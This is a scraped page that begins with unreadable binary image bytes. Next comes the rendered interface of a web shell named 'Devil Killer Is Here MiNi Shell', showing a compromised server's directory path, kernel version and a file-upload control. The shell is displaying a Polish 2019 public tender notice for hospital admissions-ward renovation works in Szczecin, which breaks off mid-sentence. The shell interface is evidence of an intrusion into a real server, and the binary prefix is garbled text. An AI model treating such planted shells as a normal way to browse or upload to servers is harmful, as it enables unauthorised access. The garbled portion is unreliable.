JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20191218/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20191218/637445-N-2019.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 637445-N-2019 z dnia 2019-12-18 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Samodzielny Publiczny Zakład Opieki Zdrowotnej MSWiA w Szczecinie</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Przebudowa pomieszczeń Izby Przyjęć oraz montaż systemu monitoringu i zagospodarowanie otoczenia – etap I – przebudowa pomieszczeń Izby Przyjęć oraz wykonanie nowego wejścia do budynku od strony północnej dla SP ZOZ MSWiA w Szczecinie (powtórka).</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Roboty budowlane</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej – mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Samodzielny Publiczny Zakład Opieki Zdrowotnej MSWiA w Szczecinie</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">81073345400000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">Jagiellońska</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">44</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">70-382</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Szczecin</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">zachodniopomorskie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">914329500, </span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">biuro@spzozmswia.szczecin.pl, </span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">914329501</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">www.spzozmswia.szczecin.pl</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Podmiot prawa publicznego</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny"></span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia">http://www.bip.spzozmswia.szczecin.pl/zamowienia-publiczne-powyzej-30-000-euro/roboty-budowlane</span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">http://www.bip.spzozmswia.szczecin.pl/zamowienia-publiczne-powyzej-30-000-euro/roboty-budowlane</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Nie</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny"></span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres"></span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Przebudowa pomieszczeń Izby Przyjęć oraz montaż systemu monitoringu i zagospodarowanie otoczenia – etap I – przebudowa pomieszczeń Izby Przyjęć oraz wykonanie nowego wejścia do budynku od strony północnej dla SP ZOZ MSWiA w Szczecinie (powtórka).</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">65/2019.</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Roboty budowlane</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Nie</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski"></span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">Przedmiot zamówienia jest przebudowa pomieszczeń Izby Przyjęć oraz montaż systemu monitoringu i zagospodarowanie otoczenia – etap I – przebudowa pomieszczeń Izby Przyjęć oraz wykonanie nowego wejścia do budynku od strony północnej dla SP ZOZ MSWiA w Szczecinie (powtórka). 1. Zamówienie polega na przebudowie istniejących pomieszczeń Izby Przyjęć SP ZOZ MSWiA w Szczecinie wraz z pomieszczeniami towarzyszącymi oraz wykonaniu nowego wejścia do budynku od strony północnej na podstawie projektu budowlanego i wykonawczego pn. „Przebudowa wejścia do Izby Przyjęć wraz z pomieszczeniami towarzyszącymi dla SP ZOZ MSWiA w Szczecinie” wykonanego przez ATΞLIΞR PRACOWNIA ARCHITEKTONICZNA KRZYSZTOF KALERT oraz decyzji o pozwoleniu na budowę. Zakres robót obejmuje objęte I etapem pomieszczenia Izby Przyjęć SP ZOZ MSWiA w Szczecinie wraz z pomieszczeniami towarzyszącymi o następujących numerach od 0/01 do 0/05 i od 0/07 do 0/11C – zgodnie z rys. PW/A/04A – Projekt wykonawczy – Architektura. Zakres robót obejmuje naprawę i malowanie ścian w miejscu wykonanych robót: przebić związanych z wykonaniem zaprojektowanej wentylacji mechanicznej. Zakres prac nie obejmuje wykonania wentylacji mechanicznej, nawiewno – wywiewnej i związanych z nią przebić, która objęta jest osobnym postępowaniem. Zakres prac nie obejmuje wykonanie konstrukcji ramy R1 pod centralę wentylacyjną. Zakres prac nie obejmuje robót zaplanowanych do wykonania w kolejnych etapach, tj. modernizacji pomieszczeń o numerach od 0/12 do 0/19C oraz wykonania toalety dla niepełnosprawnych – zgodnie z rys. PW/A/04A – Projekt wykonawczy – Architektura. Zakres robót nie obejmuje pomieszczeń znajdujących się w projektowanej części socjalnej dla pracowników SP ZOZ MSWiA w Szczecinie – pom. nr 0/20 do nr 0/33 – zgodnie z rys. PW/A/02 – Projekt wykonawczy – Architektura. Zakres prac nie obejmuje wykonania wiaty i izolacji fundamentów. Zakres prac nie obejmuje wykonania instalacji gazów medycznych.2. Projektowany zakres robót:1) roboty rozbiórkowe i demontażowe,2) nowa aranżacja wewnętrzna ścianami działowymi,3) wykonanie otworów w ścianach konstrukcyjnych,4) udrożnienie, budowa i podłączenie poszczególnych pomieszczeń do wentylacji grawitacyjnej,5) wykonanie zabezpieczeń p. poż.,6) przebudowa wewnętrznej instalacji wod. – kan., c.o., elektrycznej, zasilania i oświetlenia, oświetlenia ewakuacyjnego / awaryjnego, 7) wymiana stolarki drzwiowej i okiennej,8) budowa nowej wewnętrznej rampy,9) roboty wykończeniowe w zakresie posadzek, ścian i sufitów. Szczegółowy zakres zamówienia 1. Projektowane rozbiórki i wyburzenia:1) demontaż istniejących przyborów sanitarnych, 2) demontaż stolarki drzwiowej wewnętrznej, 3) demontaż okien zewnętrznych, podokienników, parapetów,4) skucie pozostałych okładzin ceramicznych, tynków, rozebranie suchych tynków w części projektowanego pom. 0/04 i 0/05,5) skucie okładzin ceramicznych – fartuchy, glazura przy brodziku w pozostałych pomieszczeniach (np. 0/08),6) skucie tynków po stwierdzeniu braku przyczepności – dla potrzeb zadania określono na 30% powierzchni ścian i sufitów,7) oczyszczenie ścian i stropu z cegły oraz rozbiórka posadzki w pomieszczeniu projektowanej wentylatorni*,8) rozebranie ścianek działowych,9) usunięcie starej farby ze ścian,10) usunięcie starej farby z niezabudowywanych sufitów (pom. 0/01, 0/02, 0/11A-C),11) zerwanie wykładzin, rozebranie posadzek z płytek i lastryko, 12) demontaż instalacji elektrycznej, wentylacji, wodno – kanalizacyjnej i c.o., (podejść c.o., instalacji wod. – kan., grzejników), kratek ściekowych i kanałów grawitacyjnych, odprowadzeń, 13) wykonanie otworów w ścianach konstrukcyjnych, w tym w ścianie zewnętrznej konstrukcyjnej od strony północnej celem wykonania wejścia, 14) demontaż istniejącej rampy zjazdowej stalowej (pom. 0/04A),15) demontaż krat okiennych.2. Projektowany zakres robót w branży budowlanej:1) wykonanie otworów w ścianach konstrukcyjnych,2) poszerzenie otworów,3) wykonanie nowych ścianek działowych wraz z przesklepieniem nadproży,4) wykonanie rampy / pochylni wraz z barierkami dla osób niepełnosprawnych ze stali nierdzewnej w pom. 0/04A,5) zamurowanie otworów drzwiowych,6) dostawa i montaż nowej stolarki drzwiowej – wewnętrznej, zewnętrznej, UWAGA: Dw1 – drzwi systemowe przeznaczone do stosowania w budynkach użyteczności publicznej o dużym natężeniu ruchu – przynajmniej 3 klasa mechaniczna,7) dostawa i montaż nowej stolarki okiennej z PCW, rozwierno – uchylna, kolor biały, okucia rozszczelniające, współczynnik przenikania ciepła okna U(max) = 0,9 [W/(m2 · K)]*,8) dostawa i montaż elementów p. poż., 9) dostawa i montaż nawiewników higrosterowanych w oknach (5 szt.),10) dostawa i montaż parapetów zewnętrznych z blachy powlekanej, białej (pom. 0/04 i 0/05),11) dostawa i montaż parapetów wewnętrznych,12) uzupełnienie skutych tynków cementowo - wapiennych, naprawa bruzd i tynków po wymianie / ułożeniu instalacji oraz po montażu drzwi,13) naprawa tynków, gładzi, glazury po wymianie drzwi - dot. ściany od strony pomieszczenia nie objętego modernizacją – drzwi Dw1 pomiędzy pom. 0/07 a korytarzem, drzwi Dw4 pomiędzy pom. 0/04, a korytarzem, drzwi Dw5 EI60 pomiędzy korytarzem 0/04A, a klatka schodową,14) montaż narożników tynkarskich,15) wykonanie gładzi na nowych tynkach,16) naprawa / uzupełnienie gładzi na tynkach istniejących – przygotowanie do malowania,17) roboty malarskie – malowanie ścian farbami zmywalnymi o I klasie odporności na ścieranie według PN-EN 13300 – kolory pastelowe*,18) wykonanie zabudów instalacji,19) wykonanie sufitów podwieszonych – wzór płyty uzgodnić z Zamawiającym,20) wykonanie wentylacji grawitacyjnej (w pom. 0/11A oraz szacht na klatce schodowej przy pom. 0/01),21) zakres prac w ramach pomieszczenie higieniczno – sanitarnego – dot. pom. 0/05:- skucie posadzki cementowej z podbudową i wykonanie nowych warstw z wyprofilowaniem spadków,- wykonanie izolacji p. wilgociowej na ścianach w kabinie prysznicowej, wykonanie izolacji p. wilgociowej na całej posadzce z wywinięciem na ściany na 0,15 m, wklejenie taśmy systemowej w narożnikach, - ułożenie glazury na 2,1 m, listwy wykończeniowe na narożach,- ułożenie gresu antypoślizgowego wsp. R=11 (nie wykładzina PCW, jak jest w opisie do PW Architektury),- drzwi przesuwne aluminiowe,- natrysk z odpływem w posadzce wygrodzony kotarą, wyposażony w baterię z wężem o długości min. 2,0 m oraz drążek natryskowy,- umywalka ze stali nierdzewnej wisząca z osłoniętym syfonem,- miska ustępowa wisząca ze stali nierdzewnej z samozamykającym się zaworem spłukującym wygrodzona kotarą,- barierki dla niepełnosprawnych,- macerator – po stronie Wykonawcy tylko wykonanie zasilania elektrycznego, przyłącza wody ¾” i kanalizacyjnego o średnicy 50 mm.22) wykonanie fartuchów z glazury przy umywalkach, listwy wykończeniowe po obwodzie,23) wyrównanie posadzek w celu eliminacji progów na danym poziomie,24) ułożenie wykładziny z przeznaczeniem do pomieszczeń szpitalnych z wywinięciem na ściany na wys. 10 cm z zastosowaniem listew wyobleniowych w narożach, w pom. 0/01 – 0/04, 0/04A, 0/08 – 0/11C,25) wykonanie nowych warstw posadzkowych wraz z podbudową w wentylatorni*,26) ułożenie płytek gresowych w pom. 0/03, 0/05, wentylatornia*,27) dostawa i montaż drzwi nietypowych 90x170 cm, EI60 do wentylatorni*,28) montaż listew na połączeniu posadzek z różnych materiałów,29) dostawa i montaż wpuszczanych wycieraczek szczotkowych – 1 szt.,30) gruntowanie i malowanie sufitów w pom. 0/01, 0/02, 0/11A-C,31) demontaż wieszaków w pomieszczeniu szatni – piaskowanie, ocynkowanie i malowanie proszkowe, naprawa blach montażowych, ponowny montaż, trwała numeracja,32) dostawa numerków do szatni w 5 kolorach z grawerowanym numerem – łącznie 180 szt. (szczegóły do uzgodnienia z Zamawiającym),33) pom. 0/07 wykończone jest glazurą na wysokość 2,0 m – zakres prac obejmuje naprawę tynków i gładzi po wymianie instalacji elektrycznej, przygotowanie, malowanie oraz uzupełnienie płytek po przeniesieniu drzwi*,34) montaż odbojów systemowych na ciągach komunikacyjnych i ścianach w salach chorych 0/04 i 0/08*,35) wykonanie dojścia do budynku z kostki betonowej zabezpieczonej obrzeżem oraz montaż wycieraczki zewnętrznej*,36) wykonanie we wnękach po starych otworach drzwiowych szaf zamykanych roletą aluminiową zamykaną na klucz – 3 szt. w pom. 0/04,37) dostawę i montaż kotary przeznaczonej do pomieszczeń szpitalnych (odpornej na mycie preparatami odkażającymi) wydzielającej przestrzeń wokół łóżek w pom. nr 0/04 – łączna długość prowadnicy wynosi ok. 7,0 mb,38) kolorystyka według Projektu wnętrz.3. Projektowany zakres robót w branży elektrycznej:1) uzupełnienie wyposażenia rozdzielni głównej TG w zakresie koniecznym dla tego etapu robót,2) wykonanie tablicy T2,3) wykonanie zasilania tablicy T2, 4) wyposażenie tablic w osprzęt zgodnie z projektem wykonawczym branżowym,5) przełożenie przewodów z istniejącej tablicy TB2 do projektowanej T2,6) wykonanie instalacji oświetleniowej przewodami miedzianymi trzy i czterożyłowymi o przekroju 1,5 mm² 750V, z osprzętem p. t.,7) dostawa i montaż opraw oświetleniowych LED,8) wyłączniki, przełączniki mocować na wys. 1,2 m,9) wykonanie instalacji oświetlenia ewakuacyjnego i awaryjnego przewodem miedzianym trzyżyłowym o przekroju 1,5 mm² 750V, p. t. z osprzętem n. t.,10) oprawy oświetlenia awaryjnego i ewakuacyjnego przewidziano jako LED, 11) wszystkie oprawy wyposażone w moduł awaryjny autotest,12) na środku drogi ewakuacyjnej natężenie oświetlenia powinno wynosić min. 1 Lx, natomiast przy drzwiach wyjściowych, natężenie oświetlenia powinno wynosić 5 Lx,13) czas świecenia opraw przewidziano na 3 godziny,14) oprawy ewakuacyjne i awaryjne muszą posiadać atest CNBOP – PIB zezwalający na stosowanie jako oprawy ewakuacyjne,15) doprowadzenie zasilania do paneli medycznych nad łóżkami pacjentów,16) oprawy bakteriobójcze – zasilane przewodami miedzianymi 3 x 1,5 mm² z tablicy ,,T2’’, wyłączniki opraw bakteriobójczych, należy zamontować na wysokości 1,8 m*,17) gniazda wtykowe – obwody wykonać przewodami miedzianymi 3 x 2,5 mm², 750V, z osprzętem p. t., montować na wys. 0,3 m nad listwą przypodłogową (w pomieszczeniach wilgotnych stosować osprzęt szczelny),18) gniazda komputerowe – zasilanie należy wykonać przewodami miedzianymi 3 x 2,5 mm², przy każdym stanowisku komputerowym przewidziano trzy gniazda z blokadą, mocowane na wys. 0,5 m nad listwą przypodłogową,19) zasilanie centrali wentylacyjnej w pom. 0/03 oraz agregatu zewnętrznego na dachu pom. 0/16 z projektowanej tablicy T2,20) instalacja wyrównawcza w pom. 0/05 pod umywalką – należy zamontować szynę wyrównawczą, wszystkie rury metalowe należy połączyć za pomocą przewodu DY6 mm z szyną wyrównawczą, szyny wyrównawcze należy połączyć z główną szyną wyrównawczą za pomocą przewodu DY16 mm + RL – 18 p. t.,21) ochrona przeciwporażeniowa – przewidziano samoczynne wyłączanie zasilania i wyłącznik różnicowoprądowy 30 mA, przewód ochronny oznaczyć kolorem żółtozielonym, przewód neutralny oznaczyć kolorem niebieskim,22) wykonanie instalacji LAN i telefonicznej* – należy wykonać w porozumieniu z 